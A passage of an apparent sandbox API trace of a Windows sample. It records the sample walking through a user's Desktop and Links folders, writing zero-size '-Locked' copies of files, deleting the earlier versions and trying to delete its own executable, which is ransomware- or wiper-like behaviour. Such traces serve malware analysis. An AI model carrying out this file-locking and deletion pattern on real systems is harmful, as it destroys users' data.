ftCreationTime.dwLowDateTime=0x3641ef6c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3641ef6c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3641ef6c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx-Locked-Locked", cAlternateFileName="L_WFYU~1.PPT")) returned 1 [0305.278] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3286843c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3286843c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3286843c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3-Locked", cAlternateFileName="MYZQDK~1.MP3")) returned 1 [0305.278] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36425180, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36425180, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36425180, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3-Locked-Locked", cAlternateFileName="MYZQDK~2.MP3")) returned 1 [0305.278] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287204a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287204a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287204a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav-Locked", cAlternateFileName="NRKT5N~2.WAV")) returned 1 [0305.278] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3642edd9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3642edd9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3642edd9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav-Locked-Locked", cAlternateFileName="NRKT5N~1.WAV")) returned 1 [0305.279] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287d036, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287d036, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287d036, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp-Locked", cAlternateFileName="OQWYTP~1.BMP")) returned 1 [0305.279] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364363bc, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364363bc, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364363bc, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp-Locked-Locked", cAlternateFileName="OQWYTP~2.BMP")) returned 1 [0305.280] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3288a749, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3288a749, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3288a749, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt-Locked", cAlternateFileName="SKBR_O~2.PPT")) returned 1 [0305.280] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364439d9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364439d9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364439d9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt-Locked-Locked", cAlternateFileName="SKBR_O~1.PPT")) returned 1 [0305.280] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32896a80, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32896a80, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32896a80, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg-Locked", cAlternateFileName="SONI~1.JPG")) returned 1 [0305.280] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3644aec5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3644aec5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3644aec5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg-Locked-Locked", cAlternateFileName="SONI~2.JPG")) returned 1 [0305.281] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328add42, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328add42, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328add42, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv-Locked", cAlternateFileName="STLRGM~1.FLV")) returned 1 [0305.281] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36452403, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36452403, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36452403, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv-Locked-Locked", cAlternateFileName="STLRGM~2.FLV")) returned 1 [0305.281] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328c165b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328c165b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328c165b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4-Locked", cAlternateFileName="TMHBBP~1.MP4")) returned 1 [0305.281] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364598c3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364598c3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364598c3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4-Locked-Locked", cAlternateFileName="TMHBBP~2.MP4")) returned 1 [0305.282] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328d28c0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328d28c0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328d28c0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4-Locked", cAlternateFileName="TUJLYX~2.MP4")) returned 1 [0305.282] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3645fa98, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3645fa98, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3645fa98, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4-Locked-Locked", cAlternateFileName="TUJLYX~1.MP4")) returned 1 [0305.282] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328e38e5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328e38e5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328e38e5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg-Locked", cAlternateFileName="V0ZO8W~2.JPG")) returned 1 [0305.283] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364649d0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364649d0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364649d0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg-Locked-Locked", cAlternateFileName="V0ZO8W~1.JPG")) returned 1 [0305.283] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328f37f9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328f37f9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328f37f9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png-Locked", cAlternateFileName="VL-8WX~1.PNG")) returned 1 [0305.283] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36476736, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36476736, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36476736, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png-Locked-Locked", cAlternateFileName="VL-8WX~2.PNG")) returned 1 [0305.283] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329021a3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x329021a3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x329021a3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif-Locked", cAlternateFileName="WJV4VO~2.GIF")) returned 1 [0305.284] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3647dc3b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3647dc3b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3647dc3b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif-Locked-Locked", cAlternateFileName="WJV4VO~1.GIF")) returned 1 [0305.285] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32913273, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32913273, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32913273, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked", cAlternateFileName="Y4HQQH~2.PDF")) returned 1 [0305.286] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36485145, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36485145, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36485145, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked-Locked", cAlternateFileName="Y4HQQH~1.PDF")) returned 1 [0305.286] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36485145, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36485145, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36485145, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked-Locked", cAlternateFileName="Y4HQQH~1.PDF")) returned 0 [0305.286] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0305.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0305.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0305.286] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x46 [0305.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.286] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\0aih45hu.jpg-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.287] GetFileType (hFile=0x49c) returned 0x1 [0305.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.287] GetFileType (hFile=0x49c) returned 0x1 [0305.290] CloseHandle (hObject=0x49c) returned 1 [0305.291] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3f [0305.291] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\0aih45hu.jpg-locked-locked-locked")) returned 1 [0305.292] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4d [0305.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.292] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\0aih45hu.jpg-locked-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.292] GetFileType (hFile=0x49c) returned 0x1 [0305.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.293] GetFileType (hFile=0x49c) returned 0x1 [0305.294] CloseHandle (hObject=0x49c) returned 1 [0305.295] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x46 [0305.295] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\0aih45hu.jpg-locked-locked-locked-locked")) returned 1 [0305.296] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4b [0305.296] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.296] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\4-0bkiu_zvudt.mkv-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.296] GetFileType (hFile=0x49c) returned 0x1 [0305.296] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.296] GetFileType (hFile=0x49c) returned 0x1 [0305.298] CloseHandle (hObject=0x49c) returned 1 [0305.298] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked", lpFilePart=0x0) returned 0x44 [0305.299] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\4-0bkiu_zvudt.mkv-locked-locked-locked")) returned 1 [0305.300] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x52 [0305.300] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.300] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\4-0bkiu_zvudt.mkv-locked-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.300] GetFileType (hFile=0x49c) returned 0x1 [0305.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.300] GetFileType (hFile=0x49c) returned 0x1 [0305.302] CloseHandle (hObject=0x49c) returned 1 [0305.303] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4b [0305.303] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\4-0bkiu_zvudt.mkv-locked-locked-locked-locked")) returned 1 [0305.303] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", lpFilePart=0x0) returned 0x69 [0305.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.304] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.304] GetFileType (hFile=0x49c) returned 0x1 [0305.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.304] GetFileType (hFile=0x49c) returned 0x1 [0305.306] CloseHandle (hObject=0x49c) returned 1 [0305.306] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", lpFilePart=0x0) returned 0x62 [0305.307] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe")) returned 0 [0305.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0305.309] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Links", lpFilePart=0x0) returned 0x1b [0305.309] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Links\\", lpFilePart=0x0) returned 0x1c [0305.309] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x34cb35ca, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0305.310] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x34cb35ca, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0305.310] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34c3d9d5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34c3d9d5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34c3d9d5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0305.311] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34c46153, ftCreationTime.dwHighDateTime=0x1d82250, 